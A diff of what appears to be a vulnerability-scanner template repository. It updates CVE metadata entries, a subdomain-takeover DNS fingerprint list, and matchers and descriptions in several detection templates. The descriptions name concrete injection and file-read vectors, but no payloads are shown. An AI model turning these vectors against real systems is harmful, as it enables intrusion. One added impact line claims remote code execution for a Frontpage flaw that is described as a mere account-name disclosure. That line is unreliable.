{"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"} {"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"}
@ -2207,11 +2220,13 @@
{"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"} {"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"}
{"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"} {"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"}
{"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
{"ID":"CVE-2023-46359","Info":{"Name":"cPH2 Charging Station v1.87.0 - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2023/CVE-2023-46359.yaml"}
{"ID":"CVE-2023-46574","Info":{"Name":"TOTOLINK A3700R - Command Injection","Severity":"critical","Description":"An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46574.yaml"}
{"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"} {"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"}
{"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"} {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
{"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"} {"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"}
{"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"} {"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"}
{"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"critical","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} {"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"}
{"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"} {"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"}
{"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"} {"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"}
{"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"} {"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"}
@ -2222,7 +2237,9 @@
{"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"} {"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"}
{"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"} {"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"}
{"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"} {"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"}
{"ID":"CVE-2023-6038","Info":{"Name":"H2O ImportFiles - Local File Inclusion","Severity":"high","Description":"An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6038.yaml"}
{"ID":"CVE-2023-6380","Info":{"Name":"OpenCms 14 \u0026 15 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6380.yaml"} {"ID":"CVE-2023-6380","Info":{"Name":"OpenCms 14 \u0026 15 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6380.yaml"}
{"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}
@ -2236,8 +2253,7 @@
{"ID":"CVE-2020-1938","Info":{"Name":"Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability","Severity":"critical","Description":"When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-1938.yaml"} {"ID":"CVE-2020-1938","Info":{"Name":"Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability","Severity":"critical","Description":"When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-1938.yaml"}
{"ID":"CVE-2020-7247","Info":{"Name":"OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution","Severity":"critical","Description":"OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-7247.yaml"} {"ID":"CVE-2020-7247","Info":{"Name":"OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution","Severity":"critical","Description":"OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-7247.yaml"}
{"ID":"CVE-2021-44521","Info":{"Name":"Apache Cassandra Load UDF RCE","Severity":"critical","Description":"When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.","Classification":{"CVSSScore":"9.1"}},"file_path":"network/cves/2021/CVE-2021-44521.yaml"} {"ID":"CVE-2021-44521","Info":{"Name":"Apache Cassandra Load UDF RCE","Severity":"critical","Description":"When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.","Classification":{"CVSSScore":"9.1"}},"file_path":"network/cves/2021/CVE-2021-44521.yaml"}
{"ID":"CVE-2022-0543","Info":{"Name":"Redis Sandbox Escape - Remote Code Execution","Severity":"critical","Description":"This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.\n","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2022/CVE-2022-0543.yaml"} {"ID":"CVE-2022-0543","Info":{"Name":"Redis Sandbox Escape - Remote Code Execution","Severity":"critical","Description":"This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The\nvulnerability was introduced by Debian and Ubuntu Redis packages that\ninsufficiently sanitized the Lua environment. The maintainers failed to\ndisable the package interface, allowing attackers to load arbitrary libraries.\n","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2022/CVE-2022-0543.yaml"}
{"ID":"CVE-2022-24706","Info":{"Name":"CouchDB Erlang Distribution - Remote Command Execution","Severity":"critical","Description":"In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2022/CVE-2022-24706.yaml"} {"ID":"CVE-2022-24706","Info":{"Name":"CouchDB Erlang Distribution - Remote Command Execution","Severity":"critical","Description":"In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2022/CVE-2022-24706.yaml"}
{"ID":"CVE-2022-31793","Info":{"Name":"muhttpd \u003c=1.1.5 - Local Inclusion","Severity":"high","Description":"muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2022/CVE-2022-31793.yaml"} {"ID":"CVE-2022-31793","Info":{"Name":"muhttpd \u003c=1.1.5 - Local Inclusion","Severity":"high","Description":"muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2022/CVE-2022-31793.yaml"}
{"ID":"CVE-2023-33246","Info":{"Name":"RocketMQ \u003c= 5.1.0 - Remote Code Execution","Severity":"critical","Description":"For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2023/CVE-2023-33246.yaml"} {"ID":"CVE-2023-33246","Info":{"Name":"RocketMQ \u003c= 5.1.0 - Remote Code Execution","Severity":"critical","Description":"For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2023/CVE-2023-33246.yaml"}
{"ID":"CVE-2023-46604","Info":{"Name":"Apache ActiveMQ - Remote Code Execution","Severity":"critical","Description":"Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.\nUsers are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.\n","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2023/CVE-2023-46604.yaml"}

View File

@ -1 +1 @@
db8c3c3eb9d43b2fcd262a91dc910e0f 966878414639a1d70cbb937632710839

View File

@ -55,6 +55,7 @@ dns:
- "servicebus.windows.net" - "servicebus.windows.net"
- "visualstudio.com" - "visualstudio.com"
- "-msedge.net" - "-msedge.net"
- "msappproxy.net"
- "trafficmanager.net" - "trafficmanager.net"
- type: word - type: word
@ -433,5 +434,4 @@ dns:
regex: regex:
- "IN\tCNAME\\t(.+)$" - "IN\tCNAME\\t(.+)$"
- "IN\\s*CNAME\\t(.+)$" - "IN\\s*CNAME\\t(.+)$"
# digest: 490a0046304402205694ac1cba58232ec715831e94086da7081a9b756f86016358b1347a1a340787022040615d63a66787d706d2be8b3f13cead87f7278c471091a7783bfab4e4fa2aef:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450221008eca40fb73f32c811d6d1d7283bbf220eb09a81bbaa047e4204406dd1c4da012022033a3e578c9ee7d903cff9bc617af38353d49ba0cb65955487aca3e841cdbfc56:922c64590222798bb761d5b6d8e72950

View File

@ -22,15 +22,12 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status
status:
- 200
- type: word - type: word
part: body part: body
words: words:
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N" - "NzbwpQSdbY06Dngnoteo2wdgiekm7j4Ndisplay_errors"
- "display_errors"
condition: and
# digest: 4a0a00473045022034ca38e42eb10e3f993e1ec2346f3c0e8136adef3383573241671c6fc5c91e5e022100a81c4851e42aa7d04d2e7db0c381712c112273dfd1dba5c3673643e239dd5342:922c64590222798bb761d5b6d8e72950 - type: status
status:
- 200
# digest: 4a0a00473045022100c1f96a2e3c37026b0ac58408bbaaeff224ca2cd563e06d2861342ab73272d43602203a4b1a825e300c2d3243c6930d34d7108e534729c14184babc398ba3fb3a0956:922c64590222798bb761d5b6d8e72950

View File

@ -4,6 +4,8 @@ info:
name: 360 Xintianqing - SQL Injection name: 360 Xintianqing - SQL Injection
author: SleepingBag945 author: SleepingBag945
severity: high severity: high
description: |
The Tianqing Terminal Security Management System, designed for government and enterprise use, faces a SQL injection vulnerability. This flaw could enable attackers to access sensitive database information.
reference: reference:
- https://blog.51cto.com/u_9691128/4295047 - https://blog.51cto.com/u_9691128/4295047
- https://www.cnvd.org.cn/patchInfo/show/270651 - https://www.cnvd.org.cn/patchInfo/show/270651
@ -38,5 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100e6b9c102bfc4fd3eaa2d00c82e03d07f7309513da8828cc6c303d4d071c2d5540221009d3c3f3d937d8ac546abaa6d94a3aee02d5c4c7c8831dfbce456591d4b252eda:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022006cca5f941e35ce5c204962052c2d4eb74627fc58d6de9b9976b967b1643ea8f022100e2b50bf34a6ee4636802796f5b1e866212a29264161bbc98a5553a60186651d1:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: r3naissance author: r3naissance
severity: medium severity: medium
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
impact: |
High: Remote code execution or denial of service.
remediation: Upgrade to the latest version. remediation: Upgrade to the latest version.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114 - https://nvd.nist.gov/vuln/detail/CVE-2000-0114
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a004630440220080130ec958d5667203f63c2fb769d081d8684edeb1132b8114624eb9cefeeeb022015c92a448c22916bdc29de05205539f746ae2fc9b6b641b54ef2b913d151c11f:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100d75cf6bb5b96928d10a267c9d3b68c6d215cafe2f946fc1e3c6faa5ba73986d1022100cf0262c0fa9aa5da8c6f8751c553cc77be07ca9fc62f3aec8bb35a8b9f16b490:922c64590222798bb761d5b6d8e72950

View File

@ -6,6 +6,8 @@ info:
severity: critical severity: critical
description: | description: |
HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL. HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to the affected device.
remediation: | remediation: |
Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software. Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software.
reference: reference:
@ -47,4 +49,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
